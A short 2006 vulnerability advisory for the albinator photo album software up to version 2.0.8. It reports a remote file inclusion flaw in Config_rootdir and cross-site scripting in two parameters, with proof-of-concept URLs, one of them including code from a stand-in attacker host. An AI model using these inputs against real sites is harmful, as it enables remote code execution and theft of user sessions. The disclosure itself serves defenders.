albinator <= 2.0.8 Remote File Inclusion Vuln and XSS

albinator <= 2.0.8 Remote File Inclusion Vuln and XSS

###############################################
Vuln. discovered by :VietMafia & r0t (Pridels Sec Crew)
Date: 3 may 2006
vendor:http://www.albinator.com/
affected versions:2.8 and prior
orginal advisory:http://pridels.blogspot.com/2006/05/albinator-208-remote-file-inclusion.html
###############################################

Vuln. Description:

1. Remote File Inclusion Vuln.

Input passed to the "Config_rootdir" parameter in
"eday.php","eshow.php","forgot.php" isn't properly verified, before it
is used to include files. This can be exploited to include arbitrary
files from external and local resources.

example code :

$dirpath = "$Config_rootdir";
require_once($dirpath."essential/dbc_essential.php");
require_once($dirpath."essential/globalfunctions.php");

this can lead to remote file include.

example PoC:

http://victim/eshow.php?Config_rootdir=http://evilcode.php

2. cross-site scripting attack vuln.

Input passed to the "cid" parameter in dlisting.php and to the
"preloadSlideShow" parameter in showpic.php is not properly sanitised
before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context
of an affected site.

examples:

/dlisting.php?cid=1[XSS]

/showpic.php?aid=21&uuid=175&pid=172&slide_show=
1&slide_show_secs=0&preloadSlideShow=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/